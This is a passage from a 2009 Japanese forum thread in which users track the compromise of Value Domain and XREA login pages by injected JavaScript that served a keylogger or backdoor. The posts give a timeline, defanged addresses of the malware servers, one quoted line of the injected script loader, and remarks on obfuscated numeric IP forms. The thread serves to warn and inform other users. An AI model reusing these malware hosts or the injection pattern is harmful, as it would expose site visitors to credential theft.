　　　(D)　ttp://110.135.41.103〆/dir/show.php　を呼び出している
　↓
07/06　魚拓が取得される
　　　　ttp://s03.megalodon.jp〆/2009-0706-1843-51/https://www.value-domain.com/login.php
　↓
07/06　(C)にノーガードのXPでアクセスしたところキーロガーが検出・ダウンロードされた
　↓
07/07　MSからアドバイザリ、IPAからアナウンスが出る
　　　　http://www.microsoft.com/japan/technet/security/advisory/972890.mspx
　　　　http://www.ipa.go.jp/security/ciadr/vul/20090707-ms-activex.html
　↓
07/07　(A)のlogin.phpから不正なjsコードが削除される
　　　(VD側が削除したのか、不正アクセス元が削除したのかは不明)
　↓
07/07　以前xreaで発生した改竄との関連が指摘される
　　　http://sb.xrea.com/showthread.php?p=84465
　↓
07/08　AccessAnalyzerのログイン画面に不正なJSが挿入される改竄が発見される
　　　ログイン画面　(E) ttp://ax.xrea.〆com/login.php は
　　　(F)　ttp://1856317799〆:888/jp.js　を呼び出している
　　　(G)　ttp://0x6EA52967〆:888/dir2/show.php　を呼び出している
　　　(H)　ttp://0x6EA52967〆:888/dir2/go.jpg　を呼び出している
　　　(I)　ttp://1856317799〆:888/counter.htm　を呼び出している
　　　(※注意　(E)への改竄は07/09現在まだ削除・修正されていない)
　↓
07/09　現在までVDからの公式アナウンスなし　←いまここ

このスレだけまとめてみたけど、こんな感じ?

>>907
ぐっジョブ、おつかれしたっ

>>907
付け加えるなら、

07/06 login.phpが改竄される以前に、全ドメインの個人情報DBが抜かれている可能性がある

ってことかな
コレが一番怖い！

関連のアクアナの方は現在も改竄されっぱなしだから、一連のデジロ系改竄としてそっちの方もまとめて欲しい。

ttp://wepawet.cs.ucsb.edu/

These are the last URLs we have analyzed from ax.xrea.com:
http://ax.xrea.com/support.php malicious
http://ax.xrea.com/logout.php malicious
http://ax.xrea.com/faq.php malicious
http://ax.xrea.com/rules.php malicious
http://ax.xrea.com/signup.php malicious
http://ax.xrea.com/ malicious
http://ax.xrea.com/login.php malicious

事故でウイルスまいちゃうのは、仕方ないとしても、
いつまでも放置して撒き散らし続けると、罰せられるし、損害賠償責任発生するんじゃねーの？
現実のウイルスだってそーだろ。

>>912
だから直リンするなって

LV30だから分からないんだけど、ja.wikipedia.org/wiki/ってのは関係無いんだよね？

x1.ax.xrea.com たぶんおｋ
x2.ax.xrea.com なんかおる
x3.ax.xrea.com たぶんおｋ

本当にただのキーロガーでいいのか shellだぞ 実体をばらしてよくみるんだ
実体はa.exe(攻撃鯖側名称とは異なる)ではなく、そいつが産み落とすサービスDLL

ばりゅどめ/xreaはなにをもたついてるんだ 攻撃側が本気だしてきたら(ry

こりゃネームサーバの障害は更に一ヵ月は直りそうにないな…

今知った
どうなってんだこれ
ドメインの延長しようと思ったんだがどうすりゃいいんだ
もう期限迫ってるからややこしい事できん

まだこれは最終調教への序章かも知れん

おれなら期間を短くして時間かせぎかな、
でもクレカの番号はもう入力したくねぇな

まだ連絡するとコピペしてくる事務員レベルじゃ把握出来てないのか、終わってるね。
事務員のPCも感染して管理パスも抜かれてそう。

とりあえずMSが正式対応してくれたら即ログインして移管できるドメインは全部移管
したいんだけど、MSの正式対応はまだ先かなぁ・・・

ｊｓ．ｓｒｃ　＝”ｈｔｔｐ：／／１８５６３１７７９９：８８８／ｊｐ．ｊｓ”；
↑いまこれ死んでるな

ｈｔｔｐ：／／１１０．１６５．４１．１０３／
これのレスポンスがこれ

HTTP/1.1 200 OK
Content-Length: 4
Content-Type: text/html
Content-Location: http://110.165.41.103:80/index.htm
Last-Modified: Sat, 27 Jun 2009 06:31:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Date: Thu, 09 Jul 2009 00:06:24 GMT
Connection: close

fuck

最後の一行がふざけている

>>923
ちょｗ最後の一行はなんだよｗｗｗ洒落になんねー

すまん、レスポンスのhttp全角にするの忘れた

このサーバは昔からずっとこのレスポンスだよな
有名どころだし

ふつうに .../jp.js とれたよ ざっと見昨日と変化なし

いや、ま…ふつうにhttpの本文…ｗ

個人情報消しときたいが、これじゃ怖くてログインもできんな
クレカ情報とか入れてないだけマシか……

まさか、２ｃｈを見てる社員が一人もいなくて、この事態を知らないのか？ｗ

>>787
あほか
一番左は勝手にカードから金を抜く業者だぞw

>>923
なんか変わったな。
昨日はfuzz...みたいなのが書いてあった

>>929
それは200%ないｗ
デジロ社員は関連スレ全部、常時監視してるからそんな事は絶対ないよｗ

>>930
何故ここにきてそのロングパスｗ

>>927
そうか。
こっちはお手製のhttpクライアントなので、
User-Agentを設定していないのが原因かも。

隠蔽するなら、
俺が実名出して証人になってやる。

>>931
それはたぶん888ポート
80ポートだとfuckって返ってくる

ここって、去年、XREAの広告改ざんのときと同じウイルスサーバじゃん
１年たっても何もかわってないんだな

http://16304890800/

これでヤフーになるのかｗ
これじゃドメインのブロックはできねえ

症状も同じだし、やっぱこれ新種のトロイが追加されただけで攻撃手法は１年前と何も変わってないな

ここって2年前位に中の人がさくらに移籍したって話きいたけど、その前後から悪くなった？

>>938
だとしたら、前回の見解と同じ、保守管理を依頼していたシナ人集団がまた悪さしたってことになるがｗ

まだログインしたら危ない？

これ、マジで？
今の中の人って完全に入れ替わってる？

295 ：名無し~3.EXE [sage] ：2009/07/09(木) 10:15:08 ID:HdBV/77A (2/2)
大阪なのはドメイン代行業者

Google で検索かけると一時期ヤフオクに権利譲渡とかで出品してたらしい

>>942
コピペ元ぐらい書けよ

ソース皆無の又聞きの又聞きの…

弊社サービス上の個人情報の取り扱いについて

当社は、個人情報保護法、および、関連する法令・規範を遵守します。
個人情報保護に関する管理体制を確立するとともに、当社規程を役員および従業員に周知し、その遵守を徹底いたします。
また、個人情報をお客様に明示した利用目的の範囲内で取り扱います。
また、お客様の同意がある場合または正当な理由がある場合を除き、第三者に開示または提供しません。
さらに、個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
また、お客様からの個人情報に関するお問い合わせ、開示等のご請求に誠実に対応します。



個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。
個人情報の紛失、破壊、改竄、漏洩、流出等の防止を徹底いたします。

ネトゲのmabinogiアカハックもwikiwiki.jpのせいと言うことで、やっとゲーム公式フォーラムで顛末垂れ込みされたようだ
ttp://www.mabinogi.jp/6th/community/freeBoardContent.asp?dp=0&th=74915999&ix=74915

今回の件でドメイン移管しようと思うのだが、
調べてみると移管に関してキャンペーンしている業者発見！！

今回の件で得をするのはこの業者か．．．
変に勘ぐりたくはないが、タイミングよすぎ。

こりゃ次スレはテンプレにURLを書いてもらえない
哀れな鯖屋スレになりそうだな

テンプレにURLかかれると、ウイルスコピペの可能性があるから困ることになるな
せめて全角にしようぜ

1856317799=0x6EA52967、FC2ブログにも来たようだ。
ttp://dubai.2ch.net/test/read.cgi/ogame/1245761603/560-564
サーバ丸ごとというよりはパス抜かれた特定のブログに
勝手にログインされて改竄されたっぽいけど。

>>950
今は閉鎖中

ウイルス騒ぎと関係ないのですがドメイン期限切れをまたやらかしました
CORESERVER利用者向け coresv.com および coresv.net

ドメイン切れｗｗｗｗｗｗｗｗ
whoisしてみたら普通にerror返ってくるね

崩壊がとまらないな
どうすんのこれ

以前もあったの？こんなドメイン切れが・・・。

ドメイン切れるってことは担当者が引き継ぎしないでやめたんだろうな

ん、何かおかしくない？
期限切れてないはずだけど。

ttp://whois.domaintools.com/coresv.com
ttp://whois.domaintools.com/coresv.net

＞　Created: 2006-07-07
＞　Expires: 2010-07-07
＞　Updated: 2009-07-08

>>952
ワロタ

いやこれもう笑うしかないだろ…

ドメイン切れは前にもあっただろ
俺の記憶にあるのは1回だけど他にもあるかもしれないな
残高不足といいドメイン切れといいこれは実際に誰にもすぐわかる事だから言い訳も穏ペイもできないよな
う〜んこれはまじで黄信号から赤信号に変わりかけてるような気がしてきたな

あ、切れてからupdateしたのか

みたいだね
更新はされてる

もしかしなくても今もの凄いヤバイ状況になってるの、俺ら？
レジストラ兼鯖屋がハクられたら管理してる全てのサイトが
存在そのものまで好き勝手に弄られちゃうってことだろ。
住基ネットにフルアクセスできる端末が中国に置かれてるようなもんじゃん。

規約内には、「あらゆる非常事態でドメインがどうなっても、責任は一切とらんぞボケ！」と書いてあるから、ドメイン乗っ取りがあっても、後の祭りだな。こりゃ。

いや、失効していてもWHOIS上の期限だけ伸びる場合があるので油断はできない

>>962
その規約は無効だよ。
無茶苦茶な規約作って利用者が承認して契約しても、
契約自体に違法性があった場合は裁判になったら確実に負ける。
会社が個別に作った規約よりも国が作った法律の方が強いってことだ。

俺ルールですね

そろそろサポートのおばちゃんの出番だな。

co.jp
をVDが扱っていなくて良かったorz

ひとつ明確になったのは、
リスクマネージメントが全くなってない糞会社だってことだな。

VDは安いからなぁ・・・VD以外で安い所は・・・ムームーとかFC2か？

関連サービスのドメイン失効は今年2月の大障害の時にもタイミング同じくしてやらかしてるじゃん。

特に去年の広告鯖ウイルス事件以降、ここの崩壊具合はちょっと酷いよ。
度を越してる。
回を増すごとにひどくなってるからねｗ

>>967
数年前「属性型・地域型も移管なら対応できる」と聞いて特攻してった人がいたような・・・

>952の有効期限切れについてもアナウンスしないんだろうな。

あの…
VDネームサーバがほぼ機能してない障害が5月末からずっと続いてる件については…

全部まとめて完全放置
で公式アナウンスも従来通り一切しません

完璧だｗ

ネームサーバ機能してると思うけど違うの？

どこのnamedがいかれたのか、詳細希望。
だれかdigしたもんください。

総務省に苦情や相談をすれば、改善される見込みはある？

>>977
社員乙

>>978
総務省に苦情や相談をすれば、夜逃げされる見込みはある。

ns3がちょっとレスポンス悪いけど機能してるぞ

ax.xrea.com 24時間放置あげ

>>980
ってことは、苦情・相談はしないほうがいいのか。
なんだかなあ。

記念ばりゅこ

崩壊の軌跡をまとめたサイトはないの？

いったいいつまで放置プレイするんだろう。
中の人がパス変えられてしまって入れないとかあったらみんな楽しいなｗ

>>937
16304890800
これでどうしてYahooになるのか知りたい。
どっかいじられてるの？

>>986
どんだけ馬鹿なんだよ

>>983
うちは2ヶ月前に移転済みだから苦情・相談で夜逃げされても困らない。
ここまで放置するくらいだから指導されてもなにも対処しないと思う。

>>986
このスレ全部見れば答えが分かるよ。

>>988
そうなんだけど、何もしないよりいいかなと思って。
むこうのペースに合わせざるを得ない現状がはがゆくてさ。

>>986
ロングipアドレス　でググれカス

>>989
IPAとか国民生活センターでもいいかもね

IPAはないだろｗ
岡ちゃんがやってくるぞｗｗｗｗｗｗｗｗ

次スレ御願い

次スレも何日もつか・・・
更なるハード調教が待ってる気がする

>>992
まあアレは失態だったと思うけどほかの人たちはがんばってるんで・・・
ここでそういう反応返ってくるとはおもわんかった

改竄に関するお知らせとお詫び
ttp://wikiwiki.jp/?Notice%2F2009-07-09
WIKIWIKI.jpはアナウンス出したけど、デジロはどうかな?

次スレ
VALUE DOMAINってどうよ？ part34
http://pc11.2ch.net/test/read.cgi/hosting/1247126261/

>>997
まじお疲れ様。立ててくれてありがとう。

おつおつ

>>1000なら倒産

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。